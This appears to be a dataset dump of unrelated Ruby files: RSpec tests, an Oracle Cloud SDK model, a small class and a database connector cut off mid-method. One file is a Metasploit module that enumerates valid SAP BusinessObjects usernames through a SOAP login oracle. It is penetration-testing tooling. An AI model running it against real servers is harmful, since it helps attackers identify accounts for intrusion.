2683afb6cbee74d1ea2a68b53b0f68fa5edd73cd | 1,158 | require "." / "lib" / "resolvers" / "core_lib_resolver"
describe WarningShot::CoreLibResolver do
  before :all do
    WarningShot::CoreLibResolver.logger = $logger
  end

  it 'should have tests registered' do
    WarningShot::CoreLibResolver.tests.empty?.should be(false)
  end

  it 'should not have resolutions registered' do
    WarningShot::CoreLibResolver.resolutions.empty?.should be(true)
  end

  it 'should increment #errors for unloadable core libs' do
    cld = WarningShot::CoreLibResolver.new WarningShot::Config.create,:core_lib,'bogus_core_lib_name'
    cld.test!
    cld.failed.length.should be(1)
  end

  # $" (alias $LOADED_FEATURES) lists every file `require` has loaded;
  # removing an entry lets the same file be required again.
  it 'should be able to unload file references from $"' do
    @originals = $".clone
    require 'observer'
    WarningShot::CoreLibResolver.unload(($" - @originals))
    require('observer').should be(true)
  end

  it 'should be able to purge classes from memory' do
    @original_classes = Symbol.all_symbols
    WarningShot::CoreLibResolver.purge true
    require 'observer'
    WarningShot::CoreLibResolver.purge_classes((Symbol.all_symbols - @original_classes))
    defined?(Observer).should be(nil)
  end
end
39771bccfda395d1e917f9ffe630be4603f35329 | 5,410 | require 'rails_helper'
# End-to-end journey: a candidate adds maths GCSE details, edits them,
# completes the section, then starts (and abandons) the English GCSE.
RSpec.feature 'Candidate entering GCSE details' do
  include CandidateHelper

  scenario 'Candidate submits their maths GCSE details and then update them' do
    given_i_am_signed_in
    when_i_visit_the_candidate_application_page
    and_i_click_on_the_maths_gcse_link

    then_i_see_the_add_gcse_maths_page

    when_i_do_not_select_any_gcse_option
    and_i_click_save_and_continue
    then_i_see_the_qualification_type_error

    when_i_select_gcse_option
    and_i_click_save_and_continue

    then_i_see_add_grade_page

    when_i_fill_in_the_grade
    and_i_click_save_and_continue

    then_i_see_add_year_page

    when_i_fill_in_the_year
    and_i_click_save_and_continue

    then_i_see_the_review_page_with_correct_details

    when_i_click_continue
    then_i_see_a_section_complete_error

    when_i_click_to_change_qualification_type
    then_i_see_the_gcse_option_selected

    when_i_select_a_different_qualification_type
    and_i_click_save_and_continue

    then_i_see_the_grade_page
    and_i_see_the_gcse_grade_entered

    when_i_enter_a_different_qualification_grade
    and_i_click_save_and_continue

    then_i_see_the_gcse_year_entered

    when_i_enter_a_different_qualification_year
    and_i_click_save_and_continue

    then_i_see_the_review_page_with_updated_year

    when_i_mark_the_section_as_completed
    and_click_continue
    then_i_see_the_maths_gcse_is_completed

    when_i_click_on_the_english_gcse_link
    then_i_see_the_add_gcse_english_page

    when_i_select_gcse_option
    and_i_click_save_and_continue
    then_i_see_add_english_grade_page

    when_i_choose_to_return_later
    then_i_am_returned_to_the_application_form
  end

  # --- step helpers (Given/When/Then vocabulary for the scenario above) ---

  def given_i_am_signed_in
    create_and_sign_in_candidate
  end

  def and_i_click_on_the_maths_gcse_link
    click_on 'Maths GCSE or equivalent'
  end

  def when_i_select_gcse_option
    choose('GCSE')
  end

  def and_i_click_save_and_continue
    click_button t('save_and_continue')
  end

  # Intentionally a no-op: the step documents that nothing is selected.
  def when_i_do_not_select_any_gcse_option; end

  def when_i_visit_the_candidate_application_page
    visit '/candidate/application'
  end

  def then_i_see_the_add_gcse_maths_page
    expect(page).to have_content 'What type of qualification in maths do you have?'
  end

  def then_i_see_the_review_page_with_correct_details
    expect(page).to have_content 'Maths GCSE or equivalent'
    expect(page).to have_content 'GCSE'
    expect(page).to have_content 'A'
    expect(page).to have_content '1990'
  end

  def then_i_see_the_review_page_with_updated_year
    expect(page).to have_content '2000'
  end

  def then_i_see_add_grade_page
    expect(page).to have_content t('gcse_edit_grade.page_title', subject: 'maths', qualification_type: 'GCSE')
  end

  def then_i_see_add_year_page
    expect(page).to have_content t('gcse_edit_year.page_title', subject: 'maths', qualification_type: 'GCSE')
  end

  def when_i_fill_in_the_grade
    fill_in 'Please specify your grade', with: 'A'
  end

  def when_i_fill_in_the_year
    fill_in 'Enter year', with: '1990'
  end

  def then_i_see_the_qualification_type_error
    expect(page).to have_content 'Select the type of qualification'
  end

  def then_i_see_the_gcse_option_selected
    expect(find_field('GCSE')).to be_checked
  end

  def then_i_see_the_grade_page
    expect(page).to have_content t('gcse_edit_grade.page_title', subject: 'maths', qualification_type: 'Scottish National 5')
  end

  def and_i_see_the_gcse_grade_entered
    expect(page).to have_selector("input[value='A']")
  end

  def then_i_see_the_gcse_year_entered
    expect(page).to have_selector("input[value='1990']")
  end

  def then_i_see_a_section_complete_error
    expect(page).to have_content t('activemodel.errors.models.candidate_interface/section_complete_form.attributes.completed.blank')
  end

  def when_i_select_a_different_qualification_type
    choose('Scottish National 5')
  end

  def when_i_click_to_change_qualification_type
    find_link('Change', href: candidate_interface_gcse_details_edit_type_path(subject: 'maths')).click
  end

  def when_i_enter_a_different_qualification_grade
    fill_in 'Please specify your grade', with: 'BB'
  end

  def when_i_enter_a_different_qualification_year
    fill_in 'Enter year', with: '2000'
  end

  def when_i_mark_the_section_as_completed
    choose t('application_form.completed_radio')
  end

  def then_i_see_the_maths_gcse_is_completed
    expect(page).to have_css('#maths-gcse-or-equivalent-badge-id', text: 'Completed')
  end

  def and_click_continue
    click_button t('continue')
  end

  def when_i_click_continue
    and_click_continue
  end

  def when_i_click_on_the_english_gcse_link
    click_on 'English GCSE or equivalent'
  end

  def then_i_see_add_english_grade_page
    expect(page).to have_content t('multiple_gcse_edit_grade.page_title')
  end

  def then_i_see_the_add_gcse_english_page
    expect(page).to have_content 'What type of qualification in English do you have?'
  end

  # Leaves the English section marked incomplete and continues out of it.
  def when_i_choose_to_return_later
    visit candidate_interface_gcse_review_path(subject: 'english')
    and_i_mark_the_section_as_incomplete
    and_click_continue
  end

  def and_i_mark_the_section_as_incomplete
    choose t('application_form.incomplete_radio')
  end

  def then_i_am_returned_to_the_application_form
    expect(page).to have_current_path candidate_interface_application_form_path
  end
end
| 27.18593 | 132 | 0.80573 |
1a510f72fe760a75ed6fa2a6f82c191b9feb6015 | 3,372 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'SAP BusinessObjects User Enumeration',
      'Description' => %Q{
        This module simply attempts to enumerate SAP BusinessObjects
        users.The dswsbobje interface is only used to verify valid
        users for CmcApp. Therefore, any valid users that have been
        identified can be leveraged by logging into CmcApp.
        },
      'References' =>
        [
          # General
          [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ]
        ],
      'Author' => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('URI', [false, 'Path to the SAP BusinessObjects Axis2', '/dswsbobje']),
      ])
    register_autofilter_ports([ 8080 ])
  end

  # Probe the Axis2 service listing, then try each configured username.
  def run_host(ip)
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['URI'], "/services/listServices"),
      'method' => 'GET'
    }, 25)
    # Bail out if the dswsbobje interface is unreachable.
    return unless res
    each_user_pass { |user, pass|
      enum_user(user)
    }
  end

  # Attempt a SOAP login with a deliberately invalid sentinel password.
  # The server answers "Invalid password" only when the username exists,
  # which makes the response a user-enumeration oracle.
  #
  # Returns :next_user for a valid username, :abort on errors/404.
  def enum_user(user='administrator', pass='invalid-sap-password-0d03b389-b7a1-4ecc-8898-e62d1836b72a')
    vprint_status("#{rhost}:#{rport} - Enumerating username:'#{user}'")
    success = false
    soapenv='http://schemas.xmlsoap.org/soap/envelope/'
    xmlns='http://session.dsws.businessobjects.com/2007/06/01'
    xsi='http://www.w3.org/2001/XMLSchema-instance'
    data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
    data << '<soapenv:Envelope xmlns:soapenv="' + soapenv + '" xmlns:ns="' + xmlns + '">' + "\r\n"
    data << '<soapenv:Body>' + "\r\n"
    data << '<login xmlns="' + xmlns + '">' + "\r\n"
    data << '<credential xmlns="' + xmlns + '" xmlns:ns="' + xmlns + '" xmlns:xsi="' + xsi + '" Login="' + user + '" Password="' + pass + '" xsi:type="ns:EnterpriseCredential" />' + "\r\n"
    data << '</login>' + "\r\n"
    data << '</soapenv:Body>' + "\r\n"
    data << '</soapenv:Envelope>' + "\r\n\r\n"
    begin
      res = send_request_raw({
        'uri' => normalize_uri(datastore['URI']) + "/services/Session",
        'method' => 'POST',
        'data' => data,
        'headers' =>
        {
          # FIX: Content-Length must be a byte count. String#length counts
          # characters and under-reports for multi-byte usernames.
          'Content-Length' => data.bytesize,
          'SOAPAction' => '"' + 'http://session.dsws.businessobjects.com/2007/06/01/login' + '"',
          'Content-Type' => 'text/xml; charset=UTF-8',
        }
      }, 45)
      if res
        # (Simplified: the previous `!res or (res and ...)` guard was
        # redundant inside this branch where res is known to be truthy.)
        return :abort if res.code == 404
        success = true if res.body.match(/Invalid password/i)
        success
      else
        vprint_error("[SAP BusinessObjects] No response")
        return :abort
      end
    rescue ::Rex::ConnectionError
      vprint_error("[SAP BusinessObjects] Unable to attempt authentication")
      return :abort
    end
    if success
      print_good("[SAP BusinessObjects] Found valid username : '#{user}'")
      return :next_user
    else
      return
    end
  end
end
| 32.423077 | 189 | 0.591934 |
4a3e5d9f9e59aba278ff8be62a1fed748ca67f54 | 333 | class AdoptADog::Dogs
attr_accessor :name, :breed, :location, :url, :story, :shelter
@@all = []
def initialize(name, breed, location, url)
@name = name
@breed = breed
@location = location
@url = url
@@all << self
end
def self.all
@@all
end
def self.limit_nine
@@all.slice(0,9)
end
end
| 15.136364 | 64 | 0.594595 |
aca8724bb05c4e27904f45351604e72c460c3b3a | 12,819 | # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
require_relative 'typed_object'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
  # Parameters are created and assigned values that can be configured for each integration task.
  class DataIntegration::Models::Parameter < DataIntegration::Models::TypedObject
    OUTPUT_AGGREGATION_TYPE_ENUM = [
      OUTPUT_AGGREGATION_TYPE_MIN = 'MIN'.freeze,
      OUTPUT_AGGREGATION_TYPE_MAX = 'MAX'.freeze,
      OUTPUT_AGGREGATION_TYPE_COUNT = 'COUNT'.freeze,
      OUTPUT_AGGREGATION_TYPE_SUM = 'SUM'.freeze,
      OUTPUT_AGGREGATION_TYPE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
    ].freeze

    # This can either be a string value referencing the type or a BaseType object.
    # @return [Object]
    attr_accessor :type

    # The default value of the parameter.
    # @return [Object]
    attr_accessor :default_value

    # The default value of the parameter which can be an object in DIS, such as a data entity.
    # @return [Object]
    attr_accessor :root_object_default_value

    # Specifies whether the parameter is input value.
    # @return [BOOLEAN]
    attr_accessor :is_input

    # Specifies whether the parameter is output value.
    # @return [BOOLEAN]
    attr_accessor :is_output

    # The output aggregation type.
    # @return [String]
    attr_reader :output_aggregation_type

    # The type of value the parameter was created for.
    # @return [String]
    attr_accessor :type_name

    # Attribute mapping from ruby-style variable name to JSON key.
    def self.attribute_map
      {
        # rubocop:disable Style/SymbolLiteral
        'model_type': :'modelType',
        'key': :'key',
        'model_version': :'modelVersion',
        'parent_ref': :'parentRef',
        'config_values': :'configValues',
        'object_status': :'objectStatus',
        'name': :'name',
        'description': :'description',
        'type': :'type',
        'default_value': :'defaultValue',
        'root_object_default_value': :'rootObjectDefaultValue',
        'is_input': :'isInput',
        'is_output': :'isOutput',
        'output_aggregation_type': :'outputAggregationType',
        'type_name': :'typeName'
        # rubocop:enable Style/SymbolLiteral
      }
    end

    # Attribute type mapping.
    def self.swagger_types
      {
        # rubocop:disable Style/SymbolLiteral
        'model_type': :'String',
        'key': :'String',
        'model_version': :'String',
        'parent_ref': :'OCI::DataIntegration::Models::ParentReference',
        'config_values': :'OCI::DataIntegration::Models::ConfigValues',
        'object_status': :'Integer',
        'name': :'String',
        'description': :'String',
        'type': :'Object',
        'default_value': :'Object',
        'root_object_default_value': :'Object',
        'is_input': :'BOOLEAN',
        'is_output': :'BOOLEAN',
        'output_aggregation_type': :'String',
        'type_name': :'String'
        # rubocop:enable Style/SymbolLiteral
      }
    end

    # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
    # rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral


    # Initializes the object
    # @param [Hash] attributes Model attributes in the form of hash
    # @option attributes [String] :key The value to assign to the {OCI::DataIntegration::Models::TypedObject#key #key} property
    # @option attributes [String] :model_version The value to assign to the {OCI::DataIntegration::Models::TypedObject#model_version #model_version} property
    # @option attributes [OCI::DataIntegration::Models::ParentReference] :parent_ref The value to assign to the {OCI::DataIntegration::Models::TypedObject#parent_ref #parent_ref} property
    # @option attributes [OCI::DataIntegration::Models::ConfigValues] :config_values The value to assign to the {OCI::DataIntegration::Models::TypedObject#config_values #config_values} property
    # @option attributes [Integer] :object_status The value to assign to the {OCI::DataIntegration::Models::TypedObject#object_status #object_status} property
    # @option attributes [String] :name The value to assign to the {OCI::DataIntegration::Models::TypedObject#name #name} property
    # @option attributes [String] :description The value to assign to the {OCI::DataIntegration::Models::TypedObject#description #description} property
    # @option attributes [Object] :type The value to assign to the {#type} property
    # @option attributes [Object] :default_value The value to assign to the {#default_value} property
    # @option attributes [Object] :root_object_default_value The value to assign to the {#root_object_default_value} property
    # @option attributes [BOOLEAN] :is_input The value to assign to the {#is_input} property
    # @option attributes [BOOLEAN] :is_output The value to assign to the {#is_output} property
    # @option attributes [String] :output_aggregation_type The value to assign to the {#output_aggregation_type} property
    # @option attributes [String] :type_name The value to assign to the {#type_name} property
    def initialize(attributes = {})
      return unless attributes.is_a?(Hash)

      attributes['modelType'] = 'PARAMETER'

      super(attributes)

      # convert string to symbol for hash key
      attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }

      self.type = attributes[:'type'] if attributes[:'type']

      self.default_value = attributes[:'defaultValue'] if attributes[:'defaultValue']

      raise 'You cannot provide both :defaultValue and :default_value' if attributes.key?(:'defaultValue') && attributes.key?(:'default_value')

      self.default_value = attributes[:'default_value'] if attributes[:'default_value']

      self.root_object_default_value = attributes[:'rootObjectDefaultValue'] if attributes[:'rootObjectDefaultValue']

      raise 'You cannot provide both :rootObjectDefaultValue and :root_object_default_value' if attributes.key?(:'rootObjectDefaultValue') && attributes.key?(:'root_object_default_value')

      self.root_object_default_value = attributes[:'root_object_default_value'] if attributes[:'root_object_default_value']

      self.is_input = attributes[:'isInput'] unless attributes[:'isInput'].nil?

      raise 'You cannot provide both :isInput and :is_input' if attributes.key?(:'isInput') && attributes.key?(:'is_input')

      self.is_input = attributes[:'is_input'] unless attributes[:'is_input'].nil?

      self.is_output = attributes[:'isOutput'] unless attributes[:'isOutput'].nil?

      raise 'You cannot provide both :isOutput and :is_output' if attributes.key?(:'isOutput') && attributes.key?(:'is_output')

      self.is_output = attributes[:'is_output'] unless attributes[:'is_output'].nil?

      self.output_aggregation_type = attributes[:'outputAggregationType'] if attributes[:'outputAggregationType']

      raise 'You cannot provide both :outputAggregationType and :output_aggregation_type' if attributes.key?(:'outputAggregationType') && attributes.key?(:'output_aggregation_type')

      self.output_aggregation_type = attributes[:'output_aggregation_type'] if attributes[:'output_aggregation_type']

      self.type_name = attributes[:'typeName'] if attributes[:'typeName']

      raise 'You cannot provide both :typeName and :type_name' if attributes.key?(:'typeName') && attributes.key?(:'type_name')

      self.type_name = attributes[:'type_name'] if attributes[:'type_name']
    end
    # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
    # rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral

    # Custom attribute writer method checking allowed values (enum).
    # @param [Object] output_aggregation_type Object to be assigned
    def output_aggregation_type=(output_aggregation_type)
      # rubocop:disable Style/ConditionalAssignment
      if output_aggregation_type && !OUTPUT_AGGREGATION_TYPE_ENUM.include?(output_aggregation_type)
        OCI.logger.debug("Unknown value for 'output_aggregation_type' [" + output_aggregation_type + "]. Mapping to 'OUTPUT_AGGREGATION_TYPE_UNKNOWN_ENUM_VALUE'") if OCI.logger
        @output_aggregation_type = OUTPUT_AGGREGATION_TYPE_UNKNOWN_ENUM_VALUE
      else
        @output_aggregation_type = output_aggregation_type
      end
      # rubocop:enable Style/ConditionalAssignment
    end

    # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines


    # Checks equality by comparing each attribute.
    # @param [Object] other the other object to be compared
    def ==(other)
      return true if equal?(other)

      self.class == other.class &&
        model_type == other.model_type &&
        key == other.key &&
        model_version == other.model_version &&
        parent_ref == other.parent_ref &&
        config_values == other.config_values &&
        object_status == other.object_status &&
        name == other.name &&
        description == other.description &&
        type == other.type &&
        default_value == other.default_value &&
        root_object_default_value == other.root_object_default_value &&
        is_input == other.is_input &&
        is_output == other.is_output &&
        output_aggregation_type == other.output_aggregation_type &&
        type_name == other.type_name
    end
    # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines

    # @see the `==` method
    # @param [Object] other the other object to be compared
    def eql?(other)
      self == other
    end

    # rubocop:disable Metrics/AbcSize, Layout/EmptyLines


    # Calculates hash code according to all attributes.
    # @return [Fixnum] Hash code
    def hash
      [model_type, key, model_version, parent_ref, config_values, object_status, name, description, type, default_value, root_object_default_value, is_input, is_output, output_aggregation_type, type_name].hash
    end
    # rubocop:enable Metrics/AbcSize, Layout/EmptyLines

    # rubocop:disable Metrics/AbcSize, Layout/EmptyLines


    # Builds the object from hash
    # @param [Hash] attributes Model attributes in the form of hash
    # @return [Object] Returns the model itself
    def build_from_hash(attributes)
      return nil unless attributes.is_a?(Hash)

      self.class.swagger_types.each_pair do |key, type|
        if type =~ /^Array<(.*)>/i
          # check to ensure the input is an array given that the attribute
          # is documented as an array but the input is not
          if attributes[self.class.attribute_map[key]].is_a?(Array)
            public_method("#{key}=").call(
              attributes[self.class.attribute_map[key]]
                .map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
            )
          end
        elsif !attributes[self.class.attribute_map[key]].nil?
          public_method("#{key}=").call(
            OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
          )
        end
        # or else data not found in attributes(hash), not an issue as the data can be optional
      end

      self
    end
    # rubocop:enable Metrics/AbcSize, Layout/EmptyLines

    # Returns the string representation of the object
    # @return [String] String presentation of the object
    def to_s
      to_hash.to_s
    end

    # Returns the object in the form of hash
    # @return [Hash] Returns the object in the form of hash
    def to_hash
      hash = {}
      self.class.attribute_map.each_pair do |attr, param|
        value = public_method(attr).call
        next if value.nil? && !instance_variable_defined?("@#{attr}")

        hash[param] = _to_hash(value)
      end
      hash
    end

    private

    # Outputs non-array value in the form of hash
    # For object, use to_hash. Otherwise, just return the value
    # @param [Object] value Any valid value
    # @return [Hash] Returns the value in the form of hash
    def _to_hash(value)
      if value.is_a?(Array)
        value.compact.map { |v| _to_hash(v) }
      elsif value.is_a?(Hash)
        {}.tap do |hash|
          value.each { |k, v| hash[k] = _to_hash(v) }
        end
      elsif value.respond_to? :to_hash
        value.to_hash
      else
        value
      end
    end
  end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 43.750853 | 245 | 0.696076 |
280a4c04481d96fa29be4f3cd55202e7f52766f5 | 126 | require 'rails_helper'
RSpec.describe PetSkill, type: :model do
  # Placeholder generated by the model scaffold; no examples yet.
  pending "add some examples to (or delete) #{__FILE__}"
end
| 21 | 56 | 0.746032 |
390ff8edc62a3198efeeedbc36bbd5b3a8af1681 | 119 | class EventSerializer < ActiveModel::Serializer
attributes :id, :title, :content, :entity, :schedule, :lat, :lng
end
| 29.75 | 66 | 0.739496 |
4a89534ec318bd23ec0dca5eecf4c42a510e5d7a | 993 | require 'spec_helper'
RSpec.describe NotificationPolicy, type: :policy do
  # Default: anonymous visitor against someone else's notification.
  let(:user){ }
  let(:record){ create :notification }

  subject{ NotificationPolicy.new user, record }

  context 'without a user' do
    it_behaves_like 'a policy forbidding', :index, :show, :create, :update, :destroy
  end

  context 'with a user' do
    let(:user){ create :user }
    it_behaves_like 'a policy permitting', :index
    it_behaves_like 'a policy forbidding', :show, :create, :update, :destroy
  end

  context 'with the owner' do
    let(:user){ record.user }
    it_behaves_like 'a policy permitting', :index, :show, :update
    it_behaves_like 'a policy forbidding', :create, :destroy
  end

  # The policy scope must return only the user's own notifications.
  context 'with scope' do
    let!(:other_records){ create_list :notification, 2 }
    let(:user){ create :user }
    let(:records){ create_list :notification, 2, user: user }

    subject{ NotificationPolicy::Scope.new(user, Notification).resolve }

    it{ is_expected.to match_array records }
  end
end
| 30.090909 | 84 | 0.696878 |
6aae233d33681f23b3e251b837fc20acc400ad18 | 30,527 | #!/usr/bin/env ruby
# -*- coding: utf-8 -*-
require 'rubygems'
require 'json'
require 'mysql2'
require 'timeout'
##<<<[2013/09/04 I.Noda]
## for exclusive connection use
require 'thread'
##>>>[2013/09/04 I.Noda]
require 'practis'
require 'practis/database'
require 'practis/database_command'
require 'practis/database_parser'
module Practis
module Database
#=== Database connector.
class DatabaseConnector
include Practis
# a hash that stores connectors to all kinds of databases
attr_reader :connectors
# storing database schema
attr_reader :database_parser
#=== initialize method.
#database_file :: a database configuration file
def initialize(database_file)
@connectors = {}
@database_parser = Practis::Database::DatabaseParser.new(database_file)
@database_parser.parse
end
def setup_database(paramDefs, result_set, config)
# add parameter fields to parameter table
paramDefs.each do |paramDef|
if (type_field = type_to_sqltype(paramDef.type.to_s)).nil?
error("type field requires any types. #{paramDef}")
next
end
if @database_parser.add_field(
config.read("#{DB_PARAMETER}_database_name"),
config.read("#{DB_PARAMETER}_database_tablename"),
# [2013/09/08 I.Noda] for speed up in large-scale sim.
#{field: paramDef.name, type: type_field, null: "NO"}
{field: paramDef.name, type: type_field, null: "NO", key: "MUL"}
) < 0
error("fail to add a filed. #{paramDef.name}, #{type_field}")
end
end
# add result fields to result table
result_set.each do |r|
if (type_field = type_to_sqltype(r[1])).nil?
error("type field requires any types. #{r}")
next
end
if @database_parser.add_field(
config.read("#{DB_RESULT}_database_name"),
config.read("#{DB_RESULT}_database_tablename"),
{field: r[0], type: type_field, null: r[2]}
) < 0
error("fail to add a field. #{r[0]}, #{type_field}")
end
end
database_check(config)
end
def create_node(arg_hash)
connector = @connectors[:node]
if (retval = connector.insert_record(arg_hash)).length != 0
error("fail to add node. errno: #{retval}")
return -1
end
return 0
end
def database_check(config)
DATABASE_LIST.each do |name|
# create a management database connector
db = nil
if (dbtype = config.read("#{name}_database_type")) == "mysql"
db = Practis::Database::MysqlConnector.new(
@database_parser.database_set,
config.read("#{name}_database_hostname"),
config.read("#{name}_database_management_username"),
config.read("#{name}_database_management_password"))
elsif dbtype == "mongo"
db = Practis::Database::MongoConnector.new(
@database_parser.database_set,
config.read("#{name}_database_hostname"),
config.read("#{name}_database_management_username"),
config.read("#{name}_database_management_password"))
else
error("currently MySQL and Mongo are supported, but #{dbtype} is " +
"not supported.")
end
if db.nil?
error("invalid database type: #{dbtype}")
next
end
# create a database
db_name = config.read("#{name}_database_name")
if db.exist_database?(db_name)
warn("database: #{db_name} already exists.")
else
if db.create_database(db_name) < 0
error("fail to create database :#{db_name}")
next
end
end
if db.update_setting(db_name, config.read("#{name}_database_username")) < 0
error("fail to set network config or authentification.")
next
end
# create a table
tbl_name = config.read("#{name}_database_tablename")
if db.exist_table?(db_name, tbl_name)
warn("table: #{tbl_name} already exist.")
else
if db.create_table(db_name, tbl_name) < 0
error("fail to create table: #{tbl_name}.")
next
end
end
db.close
case dbtype
when "mysql"
connectors[name.to_sym] = Practis::Database::MysqlConnector.new(
@database_parser.database_set,
config.read("#{name}_database_hostname"),
config.read("#{name}_database_username"),
config.read("#{name}_database_password"),
config.read("#{name}_database_name"),
config.read("#{name}_database_tablename"),
config.read("database_query_retry").to_i
)
when "mongo"
connectors[name.to_sym] = Practis::Database::MongoConnector.new(
@database_parser.database_set,
config.read("#{name}_database_hostname"),
config.read("#{name}_database_username"),
config.read("#{name}_database_password"),
config.read("#{name}_database_name"),
config.read("#{name}_database_tablename")
)
end
end
end
def insert_record(type, arg_hash)
if (connector = get_connector(type)).nil?
error("invalid type: #{type}")
return [nil]
end
connector.insert_record(arg_hash)
end
##--------------------------------------------------
##--- read_record(type, [condition]) {|result| ...}
## Send query to get data wrt condition.
## If ((|&block|)) is given, the block is called with
## ((|result|)) data of the query.
## If ((|&block|)) is not given, it return an Array of the
## result.
def read_record(type, condition = nil, &block)
if (connector = get_connector(type)).nil?
error("invalid type: #{type}")
return []
end
connector.read_record(condition,&block)
end
def inner_join_record(arg_hash)
# debug(arg_hash)
bcon = @connectors[arg_hash[:base_type]]
rcon = @connectors[arg_hash[:ref_type]]
condition = "#{rcon.database}.#{rcon.table} ON #{bcon.database}." +
"#{bcon.table}.#{arg_hash[:base_field]} = #{rcon.database}." +
"#{rcon.table}.#{arg_hash[:ref_field]}"
bcon.inner_join_record(condition)
end
def read_time(type = nil)
type ||= :project
connector = @connectors[type]
timeval = nil
unless (retval = connector.read({type: "runixtime"})).nil?
retval.each { |r| r.values.each { |v| timeval = v.to_i } }
end
if timeval.nil?
error("fail to get current time from the #{type} database.")
return nil
end
return timeval
end
## [2013/09/07 I.Noda]
##---read_max(type, record, valueType, condition)
## retrieve max value of ((|record|)) in database ((|type|))
## under ((|condition|)).
## valueType is :integer, :float, or nil.
## Retrieve the maximum value of ((|record|)) from database ((|type|))
## under ((|condition|)), coerced according to ((|valueType|))
## (:integer, :float, or nil for the raw value).
## Returns nil (after logging) when the query yields nothing.
def read_max(type, record, valueType, condition = nil)
  connector = @connectors[type]
  maxval = nil
  rows = connector.read({type: "rmax", record: record}, condition)
  unless rows.nil?
    rows.each do |row|
      row.values.each do |value|
        maxval =
          case valueType
          when :integer then value.to_i
          when :float   then value.to_f
          else value
          end
      end
    end
  end
  if maxval.nil?
    error("fail to get max value of #{record} from the #{type} database.")
    return nil
  end
  maxval
end
## [2013/09/08 I.Noda]
##---read_count(type, condition)
## get count of data under ((|condition|)) in database ((|type|))
## Count rows matching ((|condition|)) in database ((|type|)).
## Returns the count as an Integer, or nil (after logging) when the
## query produced no value.
def read_count(type, condition = nil)
  connector = @connectors[type]
  count = nil
  connector.read({type: "rcount"}, condition) do |rows|
    rows.each do |row|
      row.values.each { |value| count = value.to_i }
    end
  end
  if count.nil?
    error("fail to get count from the #{type} database.")
    return nil
  end
  count
end
def register_project(project_name)
connector = @connectors[:project]
id = rand(MAX_PROJECT)
if (retval = connector.read_record).length == 0
while connector.insert_record(
{project_id: id, project_name: project_name}).length != 0
id = rand(MAX_PROJECT)
end
else
ids = retval.select { |r| r["project_name"] == project_name }
if ids.length != 1
error("invalid project records")
ids.each { |i| error(i) }
return -1
end
id = ids[0]["project_id"]
end
return id
end
#=== check existing execution and register
def register_execution(execution_name, project_id, executable_command)
connector = @connectors[:execution]
id = rand(MAX_EXECUTION)
# if (retval = connector.read_record(
# "project_id = #{project_id}")).length == 0
if (retval = connector.read_record([:eq, [:field, "project_id"],
project_id])).length == 0
while connector.insert_record(
{execution_id: id,
execution_name: execution_name,
project_id: project_id,
executable_command: executable_command,
execution_status: 'empty',
execution_progress: 0.0,
number_of_node: 0,
number_of_parameter: 0,
finished_parameter: 0,
executing_parameter: 0}).length != 0
id = rand(MAX_EXECUTION)
end
else
#retval.each { |r| debug(r) }
ids = retval.select { |r| r["execution_name"] == execution_name }
if ids.length != 1
error("invalid execution records")
return -1
end
id = ids[0]["execution_id"]
end
return id
end
#=== check the node database.
def check_previous_node_database(my_node_id, execution_id, address)
connector = @connectors[:node]
prev_nodes = []
# check nodes of previous execution
unless (retval = connector.read_record).length == 0
retval.each do |r|
node_id = r["node_id"]
# If same id node exists, delete it.
if my_node_id == node_id
# unless (dretval = connector.delete_record(
# "node_id = #{my_node_id}")).nil?
unless (dretval =
connector.delete_record([:eq, [:field, "node_id"],
my_node_id])).nil?
dretval.each { |dr| warn(dr) }
end
else
# unless (uretval = connector.update_record(
# {queueing: 0,
# executing: 0,
# state: NODE_STATE_FINISH},
# "node_id = #{node_id}")).nil?
unless (uretval =
connector.update_record({ queueing: 0,
executing: 0,
state: NODE_STATE_FINISH},
[:eq, [:field, "node_id"],
node_id])).nil?
uretval.each { |ur| warn(ur) }
end
prev_nodes << {parent: r["parent"], state: NODE_STATE_FINISH,
node_type: r["node_type"], address: r["address"], id: node_id,
parallel: r["parallel"]}
end
end
end
# register manager node
if (ret = connector.insert_record(
{node_id: my_node_id,
node_type: NODE_TYPE_MANAGER,
execution_id: execution_id,
parent: 0,
address: address,
parallel: 1,
queueing: 0,
executing: 0,
state: NODE_STATE_RUNNING})).length != 0
error("fail to insert manager node.")
ret.each { |r| error(r) }
end
return prev_nodes
end
#=== check the parameter and result database
# Reconciles the parameter table with results left by a previous run:
# parameters that already have a result row are marked FINISH (when not
# already), while non-FINISH parameters without a result are deleted so
# they can be regenerated.
# returned value :: the parameter rows considered finished.
def check_previous_result_database
rconnector = @connectors[:result]
pconnector = @connectors[:parameter]
results = rconnector.read_record
parameters = pconnector.read_record
finished_parameters = []
finished_parameter_ids = []
#[2013/09/24 I.Noda] for speed up
